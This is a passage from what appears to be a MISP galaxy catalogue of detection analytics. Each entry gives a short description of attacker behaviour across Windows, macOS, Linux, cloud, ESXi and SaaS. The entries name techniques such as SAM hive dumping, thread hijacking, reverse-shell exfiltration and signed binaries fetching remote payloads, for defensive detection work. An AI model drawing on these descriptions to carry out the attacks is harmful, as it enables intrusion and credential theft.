Unusual inbound email activity where attachments or embedded URLs are delivered to users followed by execution of new processes or suspicious document behavior. Detection involves correlating email metadata, file creation, and network activity after a phishing message is received.

Internal MISP references

UUID 5ea048cd-f1d5-4da2-9128-10c53ee337c8 which can be used as unique global reference for Analytic 0188 - AN0188 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0188
mitre_platforms ['Windows']

Analytic 0881 - AN0881

Office application auto-loads a non-standard DLL during startup triggered via Office Test Registry key, often without macro warning banners. DLL persistence mechanism circumvents traditional macro defenses.

Internal MISP references

UUID a677cebe-06e8-4993-bd4c-6a6884862444 which can be used as unique global reference for Analytic 0881 - AN0881 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0881
mitre_platforms ['Office Suite']

Analytic 0818 - AN0818

Detects suspicious changes to SAML/OAuth federation configurations, such as new signing certificates, altered endpoints, or claims issuance rules granting elevated privileges.

Internal MISP references

UUID bf166688-0c78-43a5-bb87-3159c1b86584 which can be used as unique global reference for Analytic 0818 - AN0818 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0818
mitre_platforms ['SaaS']

Analytic 1808 - AN1808

The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions. During the vetting process, applications using the Android permission android.permission.CAMERA, or the iOS NSCameraUsageDescription plist entry could be given closer scrutiny.

Internal MISP references

UUID 4476a312-d2c9-459e-96a3-53ac0b676c52 which can be used as unique global reference for Analytic 1808 - AN1808 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1808
mitre_platforms ['Android']

Analytic 1089 - AN1089

Bulk enumeration of cloud user email identities through Get-Recipient, Get-Mailbox, Get-User, or Graph API directory listings by abnormal accounts or suspicious sessions.

Internal MISP references

UUID 0961ff0c-8c36-4820-948d-12855b7f5cc7 which can be used as unique global reference for Analytic 1089 - AN1089 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1089
mitre_platforms ['Office Suite']

Analytic 0819 - AN0819

User opens a file delivered by email, web, chat, or share. The handler application (Word/PDF reader/archiver) creates a file in user-controlled paths (Downloads, Temp, Desktop) and then spawns a new or unusual child process (e.g., powershell.exe, wscript.exe, cmd.exe, regsvr32.exe, rundll32.exe, msiexec.exe). Optional precursors include FileStreamCreated (URL/UNC) and Office → system32 batch writes.

Internal MISP references

UUID 328d639e-6b8d-400c-9cdd-3c255d343e47 which can be used as unique global reference for Analytic 0819 - AN0819 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0819
mitre_platforms ['Windows']

Analytic 0981 - AN0981

Invocation of built-in commands like screencapture or use of undocumented APIs from suspicious parent processes.

Internal MISP references

UUID 5f1a4795-74e5-49b9-85bb-e186ca699648 which can be used as unique global reference for Analytic 0981 - AN0981 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0981
mitre_platforms ['macOS']

Analytic 0198 - AN0198

Detects remote write activity across cloud VMs or object storage buckets within the same region/account that correlate with data aggregation across hosts.

Internal MISP references

UUID 696b98e8-10fd-4c7a-bb80-302baca34e60 which can be used as unique global reference for Analytic 0198 - AN0198 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0198
mitre_platforms ['IaaS']

Analytic 0891 - AN0891

Cloud control plane actions disabling security services (CloudTrail logging, GuardDuty, Security Hub). Detect IAM role abuse correlating with service disable events.

Internal MISP references

UUID ac692681-2851-41b4-aff9-4b5efc4c40c8 which can be used as unique global reference for Analytic 0891 - AN0891 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0891
mitre_platforms ['IaaS']

Analytic 1980 - AN1980

Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Monitor logged network traffic in response to a scan, including both protocol header and body values, for indications that adversaries have bought and/or stolen SSL/TLS certificates for use during targeting. Detection efforts may be focused on related behaviors, such as Web Protocols, Asymmetric Cryptography, and/or Install Root Certificate.

Internal MISP references

UUID babb8a91-12af-4f2d-be59-2df099acc06c which can be used as unique global reference for Analytic 1980 - AN1980 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1980
mitre_platforms ['PRE']

Analytic 0189 - AN0189

Monitor for malicious payload delivery through phishing where attachments or URLs in email clients (e.g., Thunderbird, mutt) result in unusual file creation or outbound network connections. Focus on correlation between mail logs, file writes, and execution activity.

Internal MISP references

UUID c5fe5b29-c56f-4c40-b880-051ec6644600 which can be used as unique global reference for Analytic 0189 - AN0189 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0189
mitre_platforms ['Linux']

Analytic 0918 - AN0918

Detection of EFI/firmware manipulation attempts via abnormal driver loads, unsigned kexts, or tampered NVRAM variables associated with component firmware configuration.

Internal MISP references

UUID c89e4f72-a563-4665-9934-14b9efe88a06 which can be used as unique global reference for Analytic 0918 - AN0918 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0918
mitre_platforms ['macOS']

Analytic 1098 - AN1098

Detect runtime manipulation by monitoring system calls for modifications to shared libraries, ELF binaries, or environment variables that affect how data is displayed. Look for suspicious writes to application directories and mismatch in binary integrity baselines.

Internal MISP references

UUID e2e39b7e-02e4-4e7a-966c-6b05721da8f7 which can be used as unique global reference for Analytic 1098 - AN1098 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1098
mitre_platforms ['Linux']

Analytic 1809 - AN1809

The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions. During the vetting process, applications using the Android permission android.permission.CAMERA, or the iOS NSCameraUsageDescription plist entry could be given closer scrutiny.

Internal MISP references

UUID e6c05bf0-e6d6-46f9-ba38-11b58fbf2f26 which can be used as unique global reference for Analytic 1809 - AN1809 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1809
mitre_platforms ['iOS']

Analytic 0199 - AN0199

Detects adversary use of logon script configuration via Group Policy or user object attributes, followed by script execution post-authentication. Behavior includes modification of script path or file, then process execution under user logon context.

Internal MISP references

UUID 6dae9309-90a7-4b4e-b764-9486a7ba4390 which can be used as unique global reference for Analytic 0199 - AN0199 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0199
mitre_platforms ['Windows']

Analytic 0919 - AN0919

Identifies self-modifying executables that exhibit changes in binary hash, entropy, or memory sections during or between executions—often tied to dynamic unpacking or decryption behaviors.

Internal MISP references

UUID 786c54fa-8a9f-41bc-aa22-c4a4f6a93bd7 which can be used as unique global reference for Analytic 0919 - AN0919 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0919
mitre_platforms ['Windows']

Analytic 1099 - AN1099

Monitor for runtime manipulation by observing changes in application bundles, unexpected signing modifications, and runtime API calls that inject or alter how data is displayed. Detect alterations in CFNetwork or CoreFoundation frameworks responsible for rendering data.

Internal MISP references

UUID a9c30b9d-6810-47d3-8bf5-ca787836e7ef which can be used as unique global reference for Analytic 1099 - AN1099 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1099
mitre_platforms ['macOS']

Analytic 1990 - AN1990

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID db6010df-737d-4fa1-89af-dce6c4c3c305 which can be used as unique global reference for Analytic 1990 - AN1990 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1990
mitre_platforms ['PRE']

Analytic 0991 - AN0991

Detects VMs sending outbound traffic through non-standard services or to unknown destinations. Exfiltration over reverse shells tunneled via VMkernel or custom payloads routed via hostd/vpxa.

Internal MISP references

UUID f8998263-e55f-428f-b8d0-46d9e31277d2 which can be used as unique global reference for Analytic 0991 - AN0991 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0991
mitre_platforms ['ESXi']

Analytic 2022 - AN2022

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 7726e542-666b-4eeb-8998-cddb45a41605 which can be used as unique global reference for Analytic 2022 - AN2022 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2022
mitre_platforms ['PRE']

Analytic 0222 - AN0222

Adversary exploits containerized app via ingress or service. Chain: (1) suspicious request in ingress/app logs → (2) container process spawns a shell/exec/sidecar (kubectl exec/docker exec) → (3) egress to Internet or metadata service (169.254.169.254).

Internal MISP references

UUID a57ad75c-331e-4607-b358-61f4cddb8a5d which can be used as unique global reference for Analytic 0222 - AN0222 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0222
mitre_platforms ['Containers']

Analytic 0223 - AN0223

Adversary targets cloud-hosted public endpoints. Chain: (1) ALB/ELB/Cloud LB logs show exploit-like inputs or error spikes → (2) workload spawns shell or reaches metadata API → (3) egress to new external hosts.

Internal MISP references

UUID 17f9487f-711d-4f28-9de8-209ae39d33d2 which can be used as unique global reference for Analytic 0223 - AN0223 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0223
mitre_platforms ['IaaS']

Analytic 0322 - AN0322

Phishing attempts via iCloud Mail, Gmail, or social media apps accessed on macOS systems. Defender view includes Mail.app or Safari downloads of files followed by osascript, Terminal, or abnormal child process execution.

Internal MISP references

UUID 262ce2a7-2c09-4f6d-8e9f-de57b814a2a2 which can be used as unique global reference for Analytic 0322 - AN0322 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0322
mitre_platforms ['macOS']

Analytic 2032 - AN2032

Observation of scripted network requests (e.g., using osascript, curl, or python) that include mismatched or spoofed browser User-Agent strings compared to the typical macOS Safari or Chrome baseline, especially when triggered by non-interactive launch agents, login hooks, or background daemons.

Internal MISP references

UUID 29ca0e06-e848-44cd-821a-24576276a8af which can be used as unique global reference for Analytic 2032 - AN2032 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2032
mitre_platforms ['macOS']

Analytic 2023 - AN2023

Monitor queried and logged domain name system (DNS) registry data for indications that adversaries have compromised third-party DNS servers for use during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 9eb9a81f-cf55-48f8-a8da-217a7684aff4 which can be used as unique global reference for Analytic 2023 - AN2023 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2023
mitre_platforms ['PRE']

Analytic 0232 - AN0232

Adversary modifies ESXi host login banner or MOTD file (/etc/motd), either through SSH or host console access. May involve configuration file overwrite or API calls from compromised vSphere clients.

Internal MISP references

UUID c024ed9a-02bf-436d-93f5-444e45124e2f which can be used as unique global reference for Analytic 0232 - AN0232 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0232
mitre_platforms ['ESXi']

Analytic 0224 - AN0224

Adversary exploits exposed OpenSLP on ESXi or vCenter public endpoints. Chain: inbound request pattern to mgmt service → hostd/vpxd error/crash/restart → unexpected process behavior or datastore access → outbound callback.

Internal MISP references

UUID 0668f39a-d319-427f-b29b-160399e6f79a which can be used as unique global reference for Analytic 0224 - AN0224 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0224
mitre_platforms ['ESXi']

Analytic 2024 - AN2024

Monitor logged and queried domain name system (DNS) data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.

Internal MISP references

UUID 68a7b414-9864-46c6-b629-bec6f07b5c31 which can be used as unique global reference for Analytic 2024 - AN2024 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2024
mitre_platforms ['PRE']

Analytic 0422 - AN0422

Forged SAML tokens may be leveraged to access O365 apps such as Outlook or SharePoint. Defenders should monitor for token replay across multiple clients or access attempts to privileged mailboxes without prior interactive login.

Internal MISP references

UUID 8359e4ed-c4a1-4734-a3dd-e2d3eb33bc90 which can be used as unique global reference for Analytic 0422 - AN0422 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0422
mitre_platforms ['Office Suite']

Analytic 0242 - AN0242

Defender detects execution of mdfind, launchctl, or GUI-based enumeration (e.g., /Applications/Time Machine.app) along with command-line usage of find, grep, or system_profiler to identify installed backup tools like Time Machine, Carbon Copy Cloner, or Backblaze. Often triggered from Terminal sessions or within post-exploitation scripts.

Internal MISP references

UUID e3c81570-be1b-48c8-b000-b70173c5c226 which can be used as unique global reference for Analytic 0242 - AN0242 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0242
mitre_platforms ['macOS']

Analytic 0522 - AN0522

Detects clearing of unified logs, deletion of plist files tied to persistence, and manipulation of Terminal history after initial execution.

Internal MISP references

UUID 2f0f5c7a-18ee-462e-b364-b1d8df3b2c02 which can be used as unique global reference for Analytic 0522 - AN0522 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0522
mitre_platforms ['macOS']

Analytic 0225 - AN0225

Adversary exploits public admin services on routers/firewalls/switches. Chain: anomalous HTTP/SNMP/SmartInstall inputs → device syslog errors/restarts → config changes/CLI spawn → egress to attacker C2.

Internal MISP references

UUID 72298803-0644-477f-be89-01b173202577 which can be used as unique global reference for Analytic 0225 - AN0225 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0225
mitre_platforms ['Network Devices']

Analytic 2025 - AN2025

If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during Spearphishing Link (under both Phishing and Phishing for Information) or Malicious Link.

Internal MISP references

UUID 91f5dbce-d334-4b42-9554-e94866d75a26 which can be used as unique global reference for Analytic 2025 - AN2025 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2025
mitre_platforms ['PRE']

Analytic 0252 - AN0252

Installation of configuration profiles or plist entries associated with malicious or unauthorized browser extensions.

Internal MISP references

UUID d8f9ab20-4c82-42fc-9316-91781fa9e5e1 which can be used as unique global reference for Analytic 0252 - AN0252 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0252
mitre_platforms ['macOS']

Analytic 2026 - AN2026

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Internal MISP references

UUID 1762aa55-010b-4a26-b439-7afcfcc5613d which can be used as unique global reference for Analytic 2026 - AN2026 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2026
mitre_platforms ['PRE']

Analytic 0226 - AN0226

Execution of trusted, Microsoft-signed binaries such as rundll32.exe, msiexec.exe, or regsvr32.exe used to execute externally hosted, unsigned, or suspicious payloads through command-line parameters or network retrieval.

Internal MISP references

UUID 865c00d7-fc01-4ce6-8fc8-d7a84f2ded36 which can be used as unique global reference for Analytic 0226 - AN0226 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0226
mitre_platforms ['Windows']

Analytic 0262 - AN0262

Detects modification of ESXi cron jobs, local.sh scripts, or scheduled API calls to persist custom binaries or shell scripts.

Internal MISP references

UUID e5adcc7e-5d68-4080-bb87-e901f297485d which can be used as unique global reference for Analytic 0262 - AN0262 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0262
mitre_platforms ['ESXi']

Analytic 0622 - AN0622

Abuse of mmc.exe to execute non-Microsoft or user-staged .msc files and malicious COM CLSIDs. Behavioral chain: (1) suspicious mmc.exe invocation with /a or -Embedding and non-standard .msc path → (2) COM activation of non-baseline CLSIDs by mmc.exe → (3) mmc.exe loads non-baseline DLLs (user-writable/UNC/unsigned) → (4) optional network/DNS activity from mmc.exe.

Internal MISP references

UUID e6f38f76-4e60-4b8a-881c-5d3f206e912c which can be used as unique global reference for Analytic 0622 - AN0622 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0622
mitre_platforms ['Windows']

Analytic 0227 - AN0227

Execution of trusted system binaries (e.g., split, tee, bash, env) used in uncommon sequences or chained behaviors to execute malicious payloads or perform actions inconsistent with normal system or script behavior.

Internal MISP references

UUID 273d7b27-6b7d-4017-a7f6-0cd02fd3a128 which can be used as unique global reference for Analytic 0227 - AN0227 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0227
mitre_platforms ['Linux']

Analytic 0272 - AN0272

Scripted or binary usage of X11 utilities (e.g., xdotool, wmctrl) or direct /proc/*/window mappings to discover open GUI windows and active desktops.

Internal MISP references

UUID 557d1a5d-31ae-4600-b4ed-a456d9964a83 which can be used as unique global reference for Analytic 0272 - AN0272 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0272
mitre_platforms ['Linux']

Analytic 0722 - AN0722

SaaS platforms may show forged credentials as unusual API keys, tokens, or session cookies being used without corresponding authentication. Correlated patterns include simultaneous valid sessions from multiple geographies, unusual API calls with new tokens, or bypass of expected MFA enforcement.

Internal MISP references

UUID 75d43d9f-7b54-4cd4-a6d9-523f8f9a60ff which can be used as unique global reference for Analytic 0722 - AN0722 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0722
mitre_platforms ['SaaS']

Analytic 2027 - AN2027

Monitor for contextual data about Internet-facing resources gathered from scans, such as running services or listening ports, that may indicate infrastructure an adversary has bought, leased, or rented for use during targeting. Once adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Likewise monitor queried and logged domain name system (DNS) registry data for infrastructure that adversaries may have bought, leased, or rented for use during targeting, and consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 96e1107e-7fbe-49a2-b425-9d85a6ff46df which can be used as unique global reference for Analytic 2027 - AN2027 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2027
mitre_platforms ['PRE']

Analytic 0822 - AN0822

Detects hijacking of an existing thread (OpenThread) through a behavioral chain involving thread suspension (SuspendThread), memory modification (VirtualAllocEx + WriteProcessMemory), context manipulation (SetThreadContext), and thread resumption—all within another live process's address space (ResumeThread).

Internal MISP references

UUID 26ef9aef-33eb-4df2-ba82-6ace95173c80 which can be used as unique global reference for Analytic 0822 - AN0822 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0822
mitre_platforms ['Windows']

Analytic 0228 - AN0228

Use of system binaries such as osascript, bash, or curl to download or execute unsigned code or files in conjunction with application proxying.

Internal MISP references

UUID 3e461dab-922c-48cc-aafc-51f20025bf27 which can be used as unique global reference for Analytic 0228 - AN0228 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0228
mitre_platforms ['macOS']

Analytic 0282 - AN0282

Monitors for abnormal process behavior and API calls like SetWindowsHookEx, GetAsyncKeyState, or device input polling commonly used for keystroke logging.

Internal MISP references

UUID dd283114-84d8-4b1a-a765-f3a7f378c2d1 which can be used as unique global reference for Analytic 0282 - AN0282 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0282
mitre_platforms ['Windows']

Analytic 2028 - AN2028

Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service.

Internal MISP references

UUID e6500f0c-41bd-4e04-ad9d-4a3121803175 which can be used as unique global reference for Analytic 2028 - AN2028 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2028
mitre_platforms ['PRE']

Analytic 0229 - AN0229

Adversary modifies internal UI messages (e.g., login banners, desktop wallpapers) or hosted intranet web pages by creating or altering content files using scripts or unauthorized access. Often preceded by privilege escalation or web shell deployment.

Internal MISP references

UUID 78c505c6-25a1-4cc5-b44a-0574aa019f01 which can be used as unique global reference for Analytic 0229 - AN0229 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0229
mitre_platforms ['Windows']

Analytic 0922 - AN0922

Unusual process (e.g., rundll32, mshta, wscript, or custom payloads) initiates network connection to external IPs/domains that proxy C2 traffic, often over uncommon ports or high entropy HTTP/S connections.

Internal MISP references

UUID 99b2296f-dc1c-4b0e-a05a-883a0dbb1535 which can be used as unique global reference for Analytic 0922 - AN0922 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0922
mitre_platforms ['Windows']

Analytic 2029 - AN2029

Process execution without GUI context (e.g., powershell.exe, wscript.exe) generates HTTP traffic with a spoofed User-Agent mimicking a legitimate browser. No corresponding UI application (e.g., msedge.exe) is active or in parent lineage. The User-Agent deviates from known enterprise baselines or contains spoofed platform indicators. User-Agent strings can be gathered with API calls such as ShellExecuteW to open the default browser on a socket to receive an HTTP reply, or by hard coding the User-Agent string for a specific browser.

Internal MISP references

UUID b73489af-2e95-4f41-b82e-327a84da2a1d which can be used as unique global reference for Analytic 2029 - AN2029 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2029
mitre_platforms ['Windows']

Analytic 0292 - AN0292

Use of hash-cracking tools (e.g., John the Ripper, Hashcat) after credential dumping, combined with high CPU usage or GPU invocation via unsigned binaries accessing password hash files.

Internal MISP references

UUID d2a45051-b999-4969-aeb0-d7f83d453976 which can be used as unique global reference for Analytic 0292 - AN0292 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0292
mitre_platforms ['Windows']

Analytic 0323 - AN0323

Abuse of safe mode via BCD modification, boot configuration utilities (bcdedit.exe, bootcfg.exe), and registry persistence under SafeBoot keys. Defender view: suspicious boot configuration changes correlated with registry edits that enable adversary persistence or disable defenses.

Internal MISP references

UUID d7a82fc6-047b-47a8-8b3c-d6dcab00d56b which can be used as unique global reference for Analytic 0323 - AN0323 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0323
mitre_platforms ['Windows']

Analytic 0233 - AN0233

Execution of container orchestration commands (e.g., docker exec, kubectl exec) or API-driven interactions with running containers from unauthorized hosts or non-standard user contexts. Defender sees programmatic or interactive command execution within containers outside expected CI/CD tools or automation frameworks, often followed by file writes, privilege escalation, or lateral discovery.

Internal MISP references

UUID e4dd4100-2387-4029-a478-35aefd37c288 which can be used as unique global reference for Analytic 0233 - AN0233 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0233
mitre_platforms ['Containers']

Analytic 0332 - AN0332

Detects access to media files followed by execution of scripts (bash, Python, etc.) referencing those same files, or outbound traffic triggered shortly after file read. Correlates unusual use of tools like steghide, exiftool, or image libraries.

Internal MISP references

UUID f884a712-ace6-426c-ab81-8ff33e83be92 which can be used as unique global reference for Analytic 0332 - AN0332 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0332
mitre_platforms ['Linux']

Analytic 0342 - AN0342

Detects removable drive insertion followed by unusual file access, compression, or staging activity by unauthorized users or unexpected processes.

Internal MISP references

UUID 198d4196-25f0-4e28-a95b-c89709f452ab which can be used as unique global reference for Analytic 0342 - AN0342 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0342
mitre_platforms ['Windows']

Analytic 0432 - AN0432

Process/script execution of systemsetup -gettimezone, date, ioreg, or API usage (timeIntervalSinceNow, gettimeofday) followed by time-based scheduling (launchd plist modification) or sleep-based execution.

Internal MISP references

UUID 252e5c07-8ae0-4ef8-9a98-c11b6c6d4d46 which can be used as unique global reference for Analytic 0432 - AN0432 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0432
mitre_platforms ['macOS']

Analytic 0324 - AN0324

Creation or modification of Windows services or scheduled tasks with names or descriptions mimicking legitimate entries, followed by anomalous execution of untrusted binaries or LOLBAS.

Internal MISP references

UUID 51a23f35-4a11-4119-935a-1ffebcda2839 which can be used as unique global reference for Analytic 0324 - AN0324 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0324
mitre_platforms ['Windows']

Analytic 0234 - AN0234

Defenders can detect suspicious cloud instance deletions by correlating events across authentication, instance lifecycle, and account activity. From a defender’s perspective, behaviors of interest include instances deleted shortly after creation, deletions initiated by new or rarely used accounts, deletions following snapshot creation, and deletions originating from anomalous geolocations or access keys. These may indicate adversarial attempts to destroy forensic evidence or evade detection.

Internal MISP references

UUID 602def5b-49e4-4c64-afe6-1476eac13e67 which can be used as unique global reference for Analytic 0234 - AN0234 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0234
mitre_platforms ['IaaS']

Analytic 0243 - AN0243

Monitors suspicious usage of Windows API calls like SetWindowsHookEx, GetKeyState, or polling functions within non-UI service processes, combined with Registry or driver modifications.

Internal MISP references

UUID 7924d1b1-a512-425f-b397-9e9b9887b21b which can be used as unique global reference for Analytic 0243 - AN0243 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0243
mitre_platforms ['Windows']

Analytic 0423 - AN0423

Detects data access or staging events followed by outbound data flows using unencrypted protocols (e.g., FTP, HTTP) initiated by unexpected processes or to rare destinations.

Internal MISP references

UUID d265376d-3cdc-4e95-a8ea-4c4278860218 which can be used as unique global reference for Analytic 0423 - AN0423 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0423
mitre_platforms ['Windows']

Analytic 0253 - AN0253

Manual or script-based installation of extension-like modules into browser config directories or IDE plugin paths, followed by suspicious network activity.

Internal MISP references

UUID 560f859b-2174-4655-b927-b274ad0bda3f which can be used as unique global reference for Analytic 0253 - AN0253 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0253
mitre_platforms ['Linux']

Analytic 0325 - AN0325

Creation or modification of systemd service units or cron jobs using deceptive naming and untrusted command paths, often followed by lateral network activity or privilege escalation.

Internal MISP references

UUID 5a9c1860-23ae-455e-bcab-0e0f91af5548 which can be used as unique global reference for Analytic 0325 - AN0325 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0325
mitre_platforms ['Linux']

Analytic 0532 - AN0532

Repeated or automated access to user document directories or clipboard using shell scripts or utilities like xclip/pbpaste. Detectable via auditd syscall logs or osquery file events.

Internal MISP references

UUID 70df3731-9576-4450-bd32-0f52cc8f0ec3 which can be used as unique global reference for Analytic 0532 - AN0532 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0532
mitre_platforms ['Linux']

Analytic 0235 - AN0235

An adversary running with SYSTEM-level privileges executes commands or accesses registry keys to dump the SAM hive or directly reads sensitive local files from the config directory. This behavior often involves sequential access to HKLM\SAM, HKLM\SYSTEM, and creation of .save or .dmp files, enabling offline hash extraction.

Internal MISP references

UUID 8c881d82-21c3-482c-8895-c240360eec8e which can be used as unique global reference for Analytic 0235 - AN0235 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0235
mitre_platforms ['Windows']

Analytic 0523 - AN0523

Monitors tampering with audit logs, volumes, or mounted storage often used for side-channel logging (e.g., /var/log inside containers) post-compromise.

Internal MISP references

UUID b3d533fc-010a-4ee8-b234-80f98e2443a0 which can be used as unique global reference for Analytic 0523 - AN0523 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0523
mitre_platforms ['Containers']

Analytic 0352 - AN0352

Abuse of cloud metadata APIs or CLI to push SSH public keys to authorized_keys of virtual machines.

Internal MISP references

UUID d613771b-087c-43c4-8430-2a0bf6ebb314 which can be used as unique global reference for Analytic 0352 - AN0352 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0352
mitre_platforms ['IaaS']

Analytic 0236 - AN0236

